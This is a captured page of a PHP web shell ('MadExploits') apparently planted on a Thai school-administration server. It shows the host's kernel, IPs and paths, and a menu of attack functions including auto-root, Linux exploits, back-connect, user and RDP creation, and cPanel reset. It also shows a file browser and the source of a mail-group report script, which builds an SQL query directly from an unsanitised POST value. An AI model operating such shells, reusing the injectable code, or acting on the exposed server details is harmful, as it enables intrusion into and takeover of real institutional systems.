Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
mail /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
download.php
2.02
KB
-rw-r--r--
group.php
5.55
KB
-rwxr-xr-x
group_member.php
4.34
KB
-rwxr-xr-x
group_member_report.php
2.99
KB
-rwxr-xr-x
livesearch.php
595
B
-rwxr-xr-x
maildetail.php
9.73
KB
-rwxr-xr-x
maildetail.php-1
4.72
KB
-rwxr-xr-x
maildetailx.php
5.11
KB
-rw-r--r--
permission.php
8.41
KB
-rwxr-xr-x
receive.php
8.81
KB
-rwxr-xr-x
receive.php-1
6.99
KB
-rwxr-xr-x
receive.php-2
7.35
KB
-rwxr-xr-x
receive_mobile.php
7.25
KB
-rwxr-xr-x
search.php
11.3
KB
-rwxr-xr-x
select_send.php
6.45
KB
-rwxr-xr-x
select_send.php-1
5.58
KB
-rwxr-xr-x
select_send_2.php
6.57
KB
-rwxr-xr-x
select_send_3.php
8.89
KB
-rwxr-xr-x
send.php
30.19
KB
-rwxr-xr-x
send.php-1
28.82
KB
-rwxr-xr-x
send_mobile.php
27.75
KB
-rwxr-xr-x
sendto_show.php
2.8
KB
-rwxr-xr-x
sendto_show.php-1
2.19
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : group_member_report.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); echo "<form id='frm1' name='frm1'>"; echo "<br/>"; echo "<Center>"; echo "<Font color='#006666' Size=3><B>กลุ่มบุคลากร และสมาชิกกลุ่ม (Read only)</Font>"; echo "</Cener>"; echo "<br><br>"; echo "<TABLE width='100%' boder='0' Bgcolor='#Fcf9d8'>"; echo "<Tr align='center'><Td align='center' >กลุ่มบุคลากร <select name='grp_id' size='1'>"; echo "<option value = ''>เลือก</option>" ; $sql= "select * from mail_group order by grp_id desc"; $dbquery=mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)){ if(isset($_POST['grp_id'])==$result['grp_id']) $select="selected"; else $select=""; echo "<option value=$result[grp_id] $select>$result[grp_name]</option>"; } echo "</select>" ; echo " <INPUT TYPE='button' name='smb' value='ตกลง' onclick='goto_url(1)'></Td></Tr>"; echo "</TABLE>"; if($index==1){ $sql= "select * from person_position "; $dbquery=mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)){ $position_code=$result['position_code']; $position_name=$result['position_name']; $position_ar[$position_code]=$position_name; } echo "<br/>"; echo "<table width='65%' CELLSPACING=1 CELLPADDING=2>"; echo "<tr bgcolor='#000000' height='30'>"; echo "<td align='center' width='5%'><b><font color='#FFFFFF'>ที่</td>"; echo "<td align='center' width='30%'><b><font color='#FFFFFF'>ชื่อ</td>"; echo "<td align='center' width='40%'><b><font color='#FFFFFF'>ตำแหน่ง</td>"; echo "</tr>"; $sql = "select * from mail_group_member left join person_main on mail_group_member.person_id=person_main.person_id where mail_group_member.grp_id='$_POST[grp_id]' order by person_main.department,person_main.position_code,person_main.person_order "; $dbquery = mysqli_query($connect,$sql); $n=1; While ($result = mysqli_fetch_array($dbquery)){ $person_id= $result['person_id']; $prename = $result['prename']; $name = $result['name']; $surname = $result['surname']; $post = $result['position_code']; $full_name=$prename.$name." ".$surname ; if(($n%2)==0){ $bgcolor="#e8e8e8"; }else{ $bgcolor="#F5F5F5"; } echo "<tr bgcolor=$bgcolor>"; echo "<td align=center>$n</td>"; echo "<td align='left'>$full_name</td>"; echo "<td align='left'>$position_ar[$post]</td>"; echo "</tr>"; $n++; } echo "</table>"; } //End index1 echo "<br/>"; echo "<br/>"; echo "</form>"; ?> <script> function goto_url(val){ if(val==0){ callfrm("?option=mail&task=main/group_member_report"); // page ย้อนกลับ }else if(val==1){ if(frm1.grp_id.value == ""){ alert("กรุณาเลือกกลุ่มบุคลากร"); }else{ callfrm("?option=mail&task=main/group_member_report&index=1"); //page ประมวลผล } } } </script>
Close